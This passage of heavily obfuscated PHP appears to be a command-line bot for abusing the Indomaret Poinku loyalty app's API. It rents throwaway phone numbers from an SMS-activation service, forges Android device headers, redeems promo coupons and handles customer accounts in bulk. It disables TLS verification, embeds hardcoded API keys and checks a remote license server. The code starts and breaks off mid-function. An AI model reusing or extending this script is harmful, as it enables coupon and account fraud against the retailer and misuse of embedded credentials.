    goto co3Rl;
    SS9Vf:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto ptNrg;
    d3kjh:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto SS9Vf;
    LiWDy:
    mODPI:
    goto fEX1j;
    co3Rl:
    $ruc3h[] = "\143\x6f\x6e\x74\x65\x6e\x74\x2d\164\x79\160\x65\x3a\x20\141\x70\160\x6c\x69\143\141\164\x69\x6f\156\x2f\152\163\x6f\x6e\x3b\40\x63\x68\x61\162\163\145\x74\x3d\x55\124\x46\55\x38";
    goto qYbEM;
    j_uB3:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto msTKs;
    VkCXG:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\151\x6e\x64\157\56\164\x78\164");
    goto dvwOv;
    VzERk:
    D5Y5a:
    goto dqzzv;
    HoLuL:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto jw6RG;
    NJ3UF:
    print_r($AXlcQ);
    goto e6Bs3;
    UFFaE:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto d3kjh;
    e6Bs3:
    return $ECuqv;
    goto LpSdB;
    LpSdB:
  }
  goto iIHZS;
  KOkWb:
  echo @zm6Ic("\171\x65\154\154\157\x77", "\x42\165\x69\154\x64\40\102\x79\40\x46\x45\x52\x44\131\x20\x52\x41\x4d\101\x44\110\x41\116\40");
  goto IaTZ8;
  snQTX:
  echo @zm6ic("\171\x65\x6c\x6c\157\x77", "\x20\x38\x20\x20\x2e\40\x50\x65\143\x61\x68\x20\101\x79\141\x6d\40\115\x61\163\x61\x6c\xa");
  goto IMOnB;
  pQDNX:
  if (file_exists('kodevoc.txt')) {
    $kodekode = file_get_contents("kodevoc.txt");
    echo "$kodekode\n";
    goto drear;
  }
  echo "Masukkan Kode :";
  $kodekode = trim(fgets(STDIN));
  drear:
  $wDisp = '{"couponPromoCode":"$kodekode"}';
  goto BoJhr;
  uJSyf:
  echo "\12\12";
  goto PKPd6;
  c6hC1:
  $zcN5u = XOZB4(array("\174"), $tqWr2)[0];
  goto vlvmc;
  YXEEi:
  $earOL = $sONlZ;
  goto RbmA4;
  a1rFf:
  $earOL = $sONlZ;
  goto naftu;
  C5uyC:
  echo "\12";
  goto OqLtw;
  f_eFW:
  $zvt88 = $QRhbE;
  goto cZsTg;
  fTF4v:
  echo "\xa";
  goto PqKxD;
  wPJ_E:
  echo "\xa";
  goto yCvFa;
  SXlr7:
  $jze6k = Ww9VQ("\150\164\164\x70\163\72\57\x2f\163\155\163\55\141\143\164\151\166\x61\x74\x65\56\162\165\57\x73\x74\x75\x62\x73\57\150\x61\156\144\x6c\145\x72\x5f\141\x70\x69\56\x70\150\x70\77\157\x77\156\x65\162\75\x35\x26\143\x6f\165\x6e\164\x72\171\75\x36\46\141\x70\x69\137\153\145\171\75" . $rVPVc . "\46\x73\145\162\x76\x69\143\x65\x3d\x6a\x75\x26\146\x6f\162\167\141\162\x64\x3d\60\x26\141\x63\x74\x69\157\156\x3d\x67\x65\x74\x4e\x75\x6d\x62\x65\x72\x26\x73\145\x73\x73\x69\x6f\156\111\x64\75\70\66\x66\64\142\146\x33\x31\143\61\64\x35\x62\x31\65\x64\60\x37\x33\144\x35\x62\144\x35\x38\142\143\71\61\x32\x30\x65\46\157\160\x65\162\141\164\x6f\x72\x3d\141\x6e\171", $wDisp);
  goto gZ9Oc;
  WE5C6:
  if (!($ABmxY == "\123\x75\x63\x63\x65\x73\x73")) {
    goto Zfg2N;
  }
  goto lTdia;
  p4Gny:
  echo @ZM6IC("\x67\162\145\145\156", "\115\x61\x73\x69\150\40\x64\x61\154\x61\x6d\x20\x6a\x61\x6e\147\153\141\x20\x77\x61\153\x74\x75\x2c\40\112\x69\x6b\x61\40\105\x78\x70\151\x72\x65\x64\x20\110\165\142\x75\156\147\x69\40\x43\162\145\x61\x74\157\x72\x21\41");
  goto sDo5R;
  Ul2z5:
  $Jk9cx = g8pf2("\150\x74\x74\160\x73\72\57\57\x65\x64\x74\163\141\160\160\56\x69\156\144\157\155\141\162\145\x74\160\x6f\151\x6e\x6b\165\56\x63\157\155\x2f\143\x6f\156\146\x69\x67\x75\x72\x61\164\x69\157\156\x2f\x61\x70\151\x78\55\61\x35\x30\x32\x2d\x61\x70\151\x2f\155\x6f\x62\151\x6c\145\x2f\163\x79\55\141\x70\160\55\166\x65\162\x73\151\157\x6e\57\x67\145\x74\x2d\166\145\162\x73\x69\x6f\x6e\55\153\145\x79\57\x41\116\104\122\117\111\x44", $aY0el, $GOXkU, $mlMLt);
  goto fH8o7;
  WGgVd:
  $owfHy = json_decode($XTuz1, true);
  goto aGFhl;
  vGgFB:
  if ($KMaT7 == "\104\x45\114\111\126\105\x52\131") {
    goto GWmgR;
  }
  goto yJWDH;
  rH2UI:
  vh7kR:
  goto LRFDy;
  VvV7s:
  echo "\xa";
  goto jm25w;
  z_0dp:
  if ($XDyMm == "\x31") {
    goto htQmu;
  }
  goto gbJig;
  fGnXq:
  function g1wxt($lEbop, $wDisp = null, $aY0el, $GOXkU, $mlMLt)
  {
    goto EniPp;
    ZGi3i:
    $ruc3h[] = "\x61\160\x70\163\x3a\40\x7b\42\141\x70\160\137\x76\145\162\x73\151\x6f\x6e\x22\x3a\x22\x33\56\x31\63\x2e\x30\42\x2c\42\144\145\166\x69\x63\x65\x5f\x63\154\x61\x73\163\x22\x3a\42\x50\x68\157\156\145\x22\54\42\x64\x65\166\x69\143\145\x5f\x66\x61\155\x69\x6c\171\x22\72\x22" . $GOXkU . "\42\54\x22\144\x65\166\151\143\x65\137\151\144\42\72\42" . $aY0el . "\42\x2c\42\157\x73\x5f\156\141\155\x65\42\72\x22\x41\156\144\162\x6f\x69\x64\40\120\x22\54\x22\x6f\163\x5f\166\x65\x72\x73\151\x6f\156\42\72\x22\x41\156\x64\x72\x6f\x69\x64\x20\71\42\x7d";
    goto yZMA9;
    J9PJf:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\x6e\x64\157\x2e\x74\x78\x74");
    goto d73QJ;
    OrR4Y:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto FRiaM;
    g5Bbr:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto LkGaS;
    S2I6r:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto y4Il4;
    d73QJ:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x69\156\x64\157\56\x74\170\164");
    goto cA0qm;
    pUTjL:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto J9PJf;
    PtC6x:
    $ruc3h[] = "\x63\x6f\156\164\145\x6e\x74\55\x74\171\160\145\72\x20\141\x70\160\x6c\151\x63\x61\x74\151\157\x6e\57\152\x73\157\x6e\73\40\143\150\141\x72\163\x65\164\75\125\x54\x46\55\70";
    goto C_LBw;
    ly61Y:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto WclWD;
    DBEzh:
    WJ4pk:
    goto RWQQk;
    gocLI:
    $ruc3h[] = "\x75\x73\x65\162\x2d\141\147\x65\156\x74\x3a\x20\157\153\x68\x74\x74\x70\57\x35\x2e\60\56\x30\55\x61\x6c\x70\150\141\x2e\x32";
    goto PtC6x;
    o9fiJ:
    return $ECuqv;
    goto Azywb;
    y4Il4:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto vXuAL;
    C_LBw:
    $ruc3h[] = "\x6b\x65\171\x3a\40\x5a\127\122\x30\143\x7a\111\167\115\152\105\66\x4d\x48\102\163\142\x57\x39\162\x62\147\75\x3d";
    goto ZGi3i;
    RWQQk:
    $AXlcQ = json_decode($y7f11, true);
    goto wNZRx;
    nwit0:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto ly61Y;
    LkGaS:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto pUTjL;
    offcT:
    XDUd2:
    goto ccR_h;
    ccR_h:
    return false;
    goto DBEzh;
    vXuAL:
    goto WJ4pk;
    goto offcT;
    Hn619:
    $P7lm9 = curl_getinfo($C6npe);
    goto Wn9Ip;
    yZMA9:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto g5Bbr;
    cA0qm:
    $ECuqv = curl_exec($C6npe);
    goto Hn619;
    Wn9Ip:
    if (!$P7lm9) {
      goto XDUd2;
    }
    goto S2I6r;
    EniPp:
    $C6npe = curl_init();
    goto nwit0;
    wNZRx:
    print_r($AXlcQ);
    goto o9fiJ;
    FRiaM:
    $ruc3h[] = "\x61\165\164\150\x6f\x72\151\172\141\x74\x69\x6f\156\72\x20\102\x65\x61\162\x65\x72\40" . $mlMLt;
    goto gocLI;
    WclWD:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto OrR4Y;
    Azywb:
  }
  goto dMR2J;
  hm9FI:
  if (!($fUekS == '')) {
    goto qWFPI;
  }
  goto K0_3X;
  s8ivf:
  echo "\12";
  goto XttWW;
  OUrjF:
  $upOL9 = G8Pf2("\150\x74\x74\x70\163\x3a\57\x2f\145\144\164\x73\141\x70\x70\x2e\151\156\x64\x6f\x6d\x61\162\x65\x74\160\x6f\151\156\153\x75\x2e\x63\157\155\x2f\143\x6f\165\x70\157\156\57\x61\160\151\170\55\x31\x35\60\62\x2d\141\160\151\x2f\x6d\157\142\x69\154\x65\x2f\x63\x6f\x75\160\x6f\x6e\55\144\145\164\141\151\x6c\57" . $KOeAA, $aY0el, $GOXkU, $mlMLt);
  goto jZ12F;
  yyp1X:
  if (!($fUekS == '')) {
    goto AQDm2;
  }
  goto X1oV7;
  CAT9c:
  @unlink("\160\x6f\x69\156\x68\x70\56\160\150\160");
  goto e3Mm3;
  o6KxG:
  $jTEU0++;
  goto GHojT;
  gZGkC:
  die;
  goto p4P9K;
  oX0a1:
  if (!($Pud0o == "\x74\162\165\x65")) {
    goto kZBrv;
  }
  goto IGAYC;
  KaJPP:
  echo @zM6ic("\171\145\x6c\x6c\157\167", "\x44\145\163\x6b\162\x69\160\x73\x69\x20\40\x20\40\40\x20\40\x3a\x20");
  goto XR1ud;
  YBxi2:
  echo "\12";
  goto U3tV5;
  W5Geu:
  echo "\12";
  goto b91Vm;
  pcqM1:
  die;
  goto sThR9;
  CFWEW:
  error_reporting(0);
  goto vLml6;
  BrlON:
  $zvt88 = $QRhbE;
  goto rYgvk;
  ZCLXd:
  echo "\12";
  goto ShFpT;
  jSqDU:
  $xzAuu = @$owfHy["\144\x61\164\x61"][$dQ8Tp]["\166\x61\154\165\x65"];
  goto wKmCR;
  dLuPN:
  $m0f8X = explode("\12", @file_get_contents("\155\x79\164\x6f\153\x65\x6e"));
  goto VFf4p;
  EI_SP:
  FnQw9:
  goto DTgzm;
  tRih6:
  echo @Zm6iC("\x79\145\154\154\x6f\167", "\40\61\64\40\56\40\124\141\x6d\x62\x61\150\x20\x41\x6c\141\155\141\x74\xa");
  goto E9ri5;
  M6TPS:
  $wZnHP = $lPULW[$jTEU0];
  goto dcLCq;
  a_Y_v:
  $m5BZY = gGGR_("\x68\x74\164\160\x73\72\x2f\57\141\x73\x69\x61\55\163\157\165\x74\150\x65\141\163\164\x32\x2d\x69\x64\155\x2d\x63\157\x72\160\x2d\x70\x72\144\56\x63\x6c\x6f\165\144\x66\165\156\143\164\151\157\156\x73\x2e\x6e\145\x74\57\x69\x64\155\141\x70\x70\163\x5f\x74\x72\x61\x63\x6b\x65\162\x5f\147\x61\164\145\167\x61\171", $wDisp);
  goto V9uWz;
  ge0DY:
  goto NlIKW;
  goto zeVAA;
  pnaf0:
  goto q9_1d;
  goto D3Nkz;
  FytSC:
  echo @ZM6IC("\147\162\145\x65\156", "\123\x74\x61\x74\x75\163\x20\x3a\40");
  goto jpuIB;
  Z2FTO:
  function JLW7P($lEbop, $wDisp = null)
  {
    goto iyyy0;
    w6X4y:
    uyZrm:
    goto ogerB;
    AoKyB:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto vx81b;
    vgUbo:
    if (!$P7lm9) {
      goto O1zJq;
    }
    goto AoKyB;
    NIKGY:
    $ruc3h[] = "\x78\55\146\x69\162\145\x62\x61\x73\145\55\143\154\151\145\x6e\164\55\x6c\157\147\x2d\x74\x79\160\x65\72\x20\x33";
    goto rOIqI;
    PqNnW:
    $ruc3h[] = "\125\x73\x65\162\x2d\101\x67\145\x6e\x74\x3a\40\x44\x61\154\x76\x69\x6b\57\x32\x2e\61\56\60\x20\x28\x4c\x69\x6e\165\170\73\40\x55\x3b\40\101\156\x64\x72\x6f\x69\144\x20\x39\x3b\x20\x52\x65\x64\155\x69\40\x35\x20\120\154\x75\x73\x20\102\x75\151\x6c\x64\57\120\x51\x33\x41\x2e\x31\71\x30\x38\x30\61\x2e\60\x30\62\51";
    goto Tyd5r;
    P9lPj:
    $ruc3h[] = "\x43\x6f\156\164\145\x6e\x74\x2d\x54\x79\160\x65\x3a\x20\141\160\160\154\x69\143\x61\164\151\x6f\156\x2f\x6a\163\x6f\156";
    goto ppCJ_;
    LCrT2:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\153\154\151\153\56\164\170\164");
    goto Fep1S;
    cMIRN:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto pAfQa;
    HWN69:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto KlcPa;
    O8LMB:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto HWN69;
    KN1e1:
    O1zJq:
    goto FhIFS;
    LP0bY:
    $ruc3h[] = "\130\x2d\101\156\x64\162\x6f\x69\x64\55\103\145\162\x74\72\40\101\60\x34\106\x46\71\63\x36\60\104\x38\65\x33\x33\x34\x39\67\70\62\105\x43\60\x42\66\x39\105\104\x44\104\x41\x46\x42\x45\62\x46\x35\x35\x43\61\70";
    goto aAbXU;
    z1rS_:
    return $ECuqv;
    goto RduBd;
    Fep1S:
    $ECuqv = curl_exec($C6npe);
    goto FiJVW;
    DXpD4:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto H1MJd;
    LInEs:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto HgkHm;
    HgkHm:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto O8LMB;
    INC3m:
    goto uyZrm;
    goto KN1e1;
    Tyd5r:
    $ruc3h[] = "\103\157\156\x6e\145\x63\164\151\157\156\x3a\x20\x4b\x65\145\x70\x2d\101\x6c\151\166\x65";
    goto cMIRN;
    vqpJB:
    print_r($AXlcQ);
    goto z1rS_;
    FiJVW:
    $P7lm9 = curl_getinfo($C6npe);
    goto vgUbo;
    aAbXU:
    $ruc3h[] = "\x78\55\147\157\x6f\147\x2d\141\160\151\55\153\145\171\x3a\x20\101\111\172\141\123\171\x42\141\120\x33\x50\x51\x36\x75\x6f\150\122\132\x38\121\116\x64\x72\x34\144\x44\137\123\x53\x63\x6f\124\103\164\x61\106\67\x6f\153";
    goto P9lPj;
    FhIFS:
    return false;
    goto w6X4y;
    ogerB:
    $AXlcQ = json_decode($y7f11, true);
    goto vqpJB;
    KlcPa:
    $ruc3h[] = "\170\55\146\x69\162\x65\142\141\x73\145\x2d\143\154\151\145\156\x74\72\x20\146\x69\162\x65\55\143\154\x73\x2f\61\70\x2e\x32\56\x34\40\141\x6e\x64\x72\x6f\151\144\55\x74\x61\x72\x67\x65\164\x2d\163\144\x6b\57\63\61\x20\153\157\164\x6c\x69\156\x2f\61\56\x35\56\63\61\40\146\151\x72\145\x2d\x63\x6f\x72\x65\55\153\164\x78\57\x32\60\56\60\56\x30\40\146\x69\162\x65\55\x63\154\163\x2d\153\x74\170\x2f\x31\x38\56\62\x2e\64\40\146\151\162\x65\x2d\x63\157\x72\x65\57\x32\60\56\x30\x2e\x30\x20\146\151\162\145\x2d\x63\x66\x67\x2d\x6b\x74\x78\x2f\62\x31\x2e\60\56\61\40\x66\x69\x72\x65\x2d\x61\x6e\144\162\x6f\151\144\x2f\x32\x38\x20\146\151\162\x65\55\146\143\155\57\x32\63\56\60\56\60\x20\146\151\x72\145\55\x61\142\164\57\x32\x31\x2e\x30\56\x30\x20\x61\x6e\x64\x72\157\x69\144\x2d\151\156\163\164\x61\154\154\x65\162\57\x63\x6f\x6d\56\141\156\144\162\157\151\x64\56\x76\x65\x6e\x64\151\x6e\147\40\146\151\162\145\55\151\156\x73\164\141\x6c\154\x61\164\151\157\x6e\x73\57\x31\67\56\x30\x2e\x30\x20\x66\x69\x72\145\x2d\x72\143\x2f\62\61\x2e\60\56\61\x20\x66\151\162\145\55\x61\x6e\141\x6c\171\x74\151\143\x73\55\153\x74\170\x2f\62\x30\56\x30\x2e\60\40\x64\145\x76\151\143\145\x2d\156\x61\x6d\145\x2f\154\x69\x6e\x65\x61\x67\x65\x5f\166\x69\x6e\x63\x65\x20\146\x69\162\x65\x2d\141\156\x61\x6c\171\164\151\x63\163\57\62\60\x2e\60\56\x30\40\x64\x65\x76\x69\x63\145\55\155\x6f\x64\145\x6c\57\x76\x69\x6e\143\145\40\x61\x6e\144\162\157\151\x64\55\155\151\156\x2d\x73\x64\153\57\62\61\40\141\x6e\x64\x72\157\151\x64\x2d\x70\154\141\x74\146\157\162\x6d\57\x20\144\145\x76\151\x63\145\55\142\x72\141\156\x64\57\130\x69\141\x6f\155\x69";
    goto NIKGY;
    vx81b:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto INC3m;
    ppCJ_:
    $ruc3h[] = "\x41\143\x63\x65\160\x74\x3a\x20\x61\x70\160\x6c\151\143\141\164\x69\157\156\x2f\152\x73\157\156";
    goto PqNnW;
    H1MJd:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\153\x6c\151\x6b\x2e\x74\x78\x74");
    goto LCrT2;
    rOIqI:
    $ruc3h[] = "\130\55\101\x6e\x64\x72\157\151\x64\x2d\120\141\x63\153\x61\x67\145\x3a\x20\x6d\x79\x70\157\x69\156\x2e\151\156\144\x6f\x6d\141\x72\145\164\56\141\x6e\144\x72\x6f\151\144";
    goto LP0bY;
    pAfQa:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto wWMQA;
    wWMQA:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto DXpD4;
    iyyy0:
    $C6npe = curl_init();
    goto LInEs;
    RduBd:
  }
  goto gC9XY;
  qBoxd:
  if (!($yy9BI < $DxrJr)) {
    goto bI4pG;
  }
  goto bHvhe;
  z7S0Y:
  $Jk9cx = g8PF2("\x68\x74\x74\160\x73\72\x2f\57\x65\144\164\163\141\160\160\56\x69\x6e\x64\x6f\x6d\x61\162\x65\164\160\157\x69\156\153\165\56\x63\157\x6d\x2f\143\x75\x73\164\157\x6d\x65\x72\57\x61\160\151\x78\x2d\61\65\x30\62\x2d\x61\160\x69\x2f\x6d\x6f\x62\151\x6c\x65\x2f\144\145\164\141\x69\x6c\55\143\165\163\x74\x6f\155\x65\x72\x2d\157\x72\151\147\151\156", $aY0el, $GOXkU, $mlMLt);
  goto MK_kh;
  pDwqG:
  echo "\12";
  goto yxAIq;
  vj_Vw:
  $jTEU0;
  goto fXbxp;
  vsRDz:
  echo $jTEU0;
  goto z7S0Y;
  fH8o7:
  $wDisp = "\x7b\42\x75\x73\145\x72\111\x64\x22\72" . $R_bYC . "\54\x22\x64\145\x76\x69\143\x65\x54\171\160\x65\x22\72\42\x30\61\42\x2c\42\144\145\x76\151\143\x65\x49\x64\42\x3a\42" . $aY0el . "\42\x2c\42\x66\x63\x6d\124\157\153\x65\x6e\42\72\x22" . $WYrgv . "\x3a\101\x50\101\71\x31\x62\x46\x74\71\x57\x75\117\x64\156\x59\151\164\x5f\x68\117\166\x71\x6d\x48\103\62\165\115\x47\x69\x69\x43\167\160\137\165\70\x4a\147\117\x30\153\x42\x33\x73\x67\x59\121\x4e\170\x6f\x57\x71\x4f\65\67\x45\105\131\160\x41\101\101\126\x6a\x6a\x44\x43\131\70\x43\x34\x6a\x2d\x65\x50\x48\x43\131\107\x36\x4d\147\143\x67\x38\x35\x52\145\x68\x4e\x4f\x33\63\x78\x74\61\x52\122\120\66\104\x49\120\126\165\63\66\x71\153\106\x48\144\153\x66\121\71\x47\145\124\104\x48\x38\127\x46\x72\x53\141\151\x69\x42\172\x6b\x65\x5a\107\155\x39\x77\x70\x22\x7d";
  goto ozeA_;
  i29Nz:
  $wDisp = '';
  goto TeXIq;
  HcczB:
  echo "\xa";
  goto Q5jat;
  owgsu:
  echo @ZM6ic("\162\x65\144", "\12\x7e\176\x7e\176\x7e\176\176\x7e\x7e\176\176\176\176\x7e\176\x7e\176\176\176\176\176\x7e\x7e\176\176\176\176\176\x7e\x7e\176\176\x7e\x7e\x7e\176\176\176\176\176\176\x7e\176\176\176\x7e\176\176\xa");
  goto NYvnF;
  ffkgN:
  if (!($fUekS == '')) {
    goto mZtnb;
  }
  goto Tgd35;
  wkpJu:
  EIaaQ:
  goto DFm1c;
  c7EKQ:
  echo @Zm6iC("\171\145\x6c\154\157\x77", "\120\x6f\163\164\141\x6c\x20\103\157\144\145\40\x20\40\40\x20\x3a\40");
  goto X6t3o;
  s0too:
  $m5BZY = GGgr_("\150\164\164\160\163\x3a\x2f\57\141\x73\151\141\x2d\163\x6f\x75\x74\x68\145\141\163\x74\x32\x2d\x69\x64\x6d\55\x63\157\x72\x70\x2d\x70\x72\144\56\x63\x6c\x6f\x75\144\146\165\x6e\143\x74\x69\x6f\156\x73\56\x6e\145\164\x2f\151\x64\x6d\x61\160\x70\163\x5f\x74\162\x61\143\153\x65\162\137\147\x61\164\145\x77\x61\171", $wDisp);
  goto SD9A7;
  rNvLE:
  if (!unlink($xp_1p)) {
    goto sa5ia;
  }
  goto xzo8f;
  C3iNo:
  echo @zM6iC("\x72\145\x64", "\131\141\x68\x2e\56\x2e\x20\x41\171\141\x6d\x20\116\171\x61\40\107\x61\x20\x41\144\141\x20\54\40\x41\x6b\x61\x6e\40\104\151\40\103\x65\x6b\x20\x4b\145\x6d\142\x61\154\151\x2e\x2e\x2e");
  goto cAIMe;
  nof22:
  $Jk9cx = G8pF2("\150\x74\164\160\x73\72\57\57\145\144\164\163\x61\160\x70\x2e\151\x6e\144\157\155\141\162\x65\x74\x70\x6f\151\x6e\x6b\x75\56\x63\x6f\x6d\57\143\165\163\164\x6f\155\x65\162\x2f\x61\x70\x69\x78\55\61\x35\60\x32\55\x61\160\151\x2f\x69\x73\x2d\x77\150\141\x74\163\141\160\x70\x2d\x76\145\x72\151\x66\x69\145\144", $aY0el, $GOXkU, $mlMLt);
  goto bvGw_;
  Ghhvp:
  $fUekS = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinmastif"));
  goto fDZVQ;
  uC_Nz:
  $owfHy = json_decode($o0WQD, true);
  goto zhjgh;
  CcQD1:
  echo @zm6iC("\x6e\145\x76\x79", "\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\x41\x41\x4d\x49\111\x4e\40");
  goto n9nIa;
  ahhce:
  echo $yy9BI . "\x2e\x20";
  goto Bj4_J;
  a4SB4:
  echo @ZM6iC("\162\145\x64", "\116\117\124\x49\103\105\x20\x21\41\40\72\40\xa");
  goto VOfPN;
  jibTK:
  curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, false);
  goto evno_;
  vKN4h:
  die;
  goto nODjW;
  cWc10:
  ZQCA7:
  goto kPhu0;
  ALS0m:
  goto CIb70;
  goto mdOEh;
  nMz0f:
  echo "\12";
  goto rnY5C;
  RPGGf:
  $wDisp = '';
  goto wPlvB;
  rX_9S:
  $qaGLY = str_replace("\55", '', $AxbWA);
  goto y0A3r;
  Y2gfk:
  $p4iky = @$Ap1KM["\144\x61\x74\141"]["\155\145\155\142\x65\x72\x49\144"];
  goto Vqsgq;
  lzQ4l:
  echo @Zm6Ic("\147\x72\145\x65\156", $wd9cN);
  goto CH3Nn;
  i2jbT:
  goto KwD0u;
  goto OpF1q;
  ZNBgL:
  echo @ZM6IC("\x79\145\x6c\154\157\x77", "\40\40\x20\40\x20\40\40\x20\40\x20\40\123\x43\40\x47\x41\122\x41\120\x41\116\x20\x49\x44\x4d\40\x50\117\111\x4e\x4b\125\12");
  goto Y8zV2;
  zxkeE:
  $v1ZMX = str_replace("\xd", '', $wPFxB);
  goto D7qnE;
  MxBPD:
  $wDisp = '';
  goto GLRDO;
  A8e5b:
  echo @zm6ic("\x6e\x65\166\x79", $BW_8H);
  goto E30iU;
  nwH7V:
  echo "\xa";
  goto AIk12;
  YbjIM:
  $GOXkU = $w5ulg;
  goto QV7b_;
  pg4Im:
  if (!($ZNU2M == '')) {
    goto u7NvT;
  }
  goto nxIft;
  iaYFB:
  goto V7t6B;
  goto lNcIn;
  dGJoR:
  $wDisp = "\173\42\144\x61\164\x61\x22\x3a\133\173\x22\x61\160\x70\154\x69\x63\x61\x74\151\x6f\x6e\42\72\x7b\42\141\160\x70\137\166\145\x72\163\x69\x6f\x6e\42\x3a\42\x33\56\61\x33\x2e\x30\42\54\42\144\x65\x76\151\143\145\x5f\x63\x6c\x61\163\163\x22\x3a\42\x50\x68\x6f\156\145\42\x2c\x22\144\145\x76\x69\143\145\x5f\146\x61\155\151\x6c\x79\42\72\x22" . $GOXkU . "\42\54\x22\x64\145\166\151\x63\x65\x5f\x69\144\x22\x3a\x22" . $aY0el . "\x22\x2c\x22\157\x73\x5f\156\141\x6d\x65\42\72\42\101\156\x64\162\x6f\151\144\40\120\42\54\x22\157\163\x5f\166\145\x72\x73\151\x6f\x6e\42\x3a\x22\x41\x6e\144\162\157\151\144\x20\71\42\x7d\54\42\x63\157\x72\145\x22\72\x7b\x22\145\x76\x65\x6e\164\x5f\156\x61\x6d\145\42\x3a\42\160\x61\x67\145\137\x76\151\145\167\x22\x2c\x22\145\x76\145\x6e\x74\x5f\x74\x69\x6d\x65\163\164\x61\x6d\160\42\x3a" . $nb9cm . "\x2c\42\x70\141\x67\145\x5f\x6e\141\x6d\145\x22\x3a\x22\166\145\x72\151\146\151\143\141\164\151\x6f\156\x22\x2c\42\160\x61\x67\x65\137\165\162\x6c\x70\x61\164\x68\42\72\x22\x22\175\54\42\155\x61\x72\153\145\164\151\x6e\x67\x22\72\x7b\x22\x75\164\x6d\x5f\x72\141\167\42\72\x22\165\x74\x6d\x5f\163\x6f\165\x72\x63\145\x3d\x67\x6f\x6f\x67\x6c\x65\x2d\x70\x6c\141\171\x26\165\164\x6d\137\155\145\144\x69\x75\x6d\75\x6f\162\x67\141\156\x69\143\x22\175\x2c\x22\165\x73\x65\162\x22\72\173\x22\x73\x65\x73\x73\x69\x6f\x6e\137\151\144\42\72\42" . $MXjqh . "\x22\54\x22\165\x73\x65\x72\137\151\160\137\141\x64\x64\x72\145\x73\x73\x22\72\42\x31\62\x37\56\x30\x2e\x30\56\61\x22\x7d\175\135\x7d";
  goto aBtiv;
  hp69C:
  echo "\xa";
  goto jBZZl;
  b8dwF:
  echo @zM6ic("\x79\x65\154\154\157\x77", "\104\145\163\153\162\x69\160\x73\151\40\72\x20");
  goto A8e5b;
  wSlsQ:
  $DxrJr = "\x31\61";
  goto mN1x6;
  Sc9EK:
  hLVkj:
  goto E9Kac;
  R5OGU:
  $wDisp = "\x7b\x22\160\x68\157\156\145\x4e\165\155\142\x65\162\x22\x3a\x22" . $zn5zd . "\42\x2c\42\x64\x65\166\x69\x63\x65\111\144\x22\72\x22" . $aY0el . "\42\175";
  goto hjVag;
  kqX3g:
  echo "\xa";
  goto MwsHo;
  ZVOO3:
  if (!($fUekS == '')) {
    goto eYgid;
  }
  goto BQie2;
  Aq2AZ:
  $XTuz1 = G1Wxt("\150\164\164\160\163\72\57\57\x65\x64\x74\163\141\160\160\x2e\151\156\x64\157\155\141\x72\x65\x74\x70\157\x69\156\153\165\56\x63\157\155\x2f\x63\165\x73\164\x6f\155\x65\162\x2f\141\x70\x69\x78\x2d\x31\65\x30\x32\55\141\x70\x69\57\x6d\x6f\142\x69\x6c\x65\57\x63\165\163\164\x6f\155\145\162\55\141\144\x64\162\x65\x73\163", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto euWkj;
  Mtb9w:
  echo "\xa";
  goto XGQ70;
  uWkTX:
  echo "\xa";
  goto utQaz;
  Vn1b5:
  $wd9cN = date("\144\x2d\x6d\55\131\x20\174\x20\x48\x3a\151\x3a\x73");
  goto A3f9Q;
  tRe9c:
  $Jk9cx = G8pf2("\x68\x74\164\160\163\72\x2f\x2f\x65\144\164\x73\141\x70\160\x2e\151\x6e\144\x6f\155\x61\x72\x65\x74\160\157\151\156\153\x75\x2e\143\157\x6d\x2f\x63\x75\x73\x74\x6f\x6d\x65\162\57\x61\160\x69\x78\55\x31\65\60\x32\x2d\x61\x70\151\x2f\x6d\x6f\142\x69\154\145\x2f\144\145\x74\x61\x69\154\x2d\143\x75\163\164\x6f\155\x65\x72\x2d\x6f\162\151\147\151\x6e", $aY0el, $GOXkU, $mlMLt);
  goto XgCp2;
  t5U4C:
  GGXBW:
  goto v81hS;
  jpdpf:
  goto hc1uy;
  goto XiQh1;
  DpEee:
  if (!($XDyMm == "\x30")) {
    goto f7coE;
  }
  goto EGbwm;
  BCr2g:
  echo "\xa";
  goto zFn3e;
  hEdN_:
  echo @zM6IC("\x67\x72\145\145\x6e", $wd9cN);
  goto ZUJjN;
  Gqhb0:
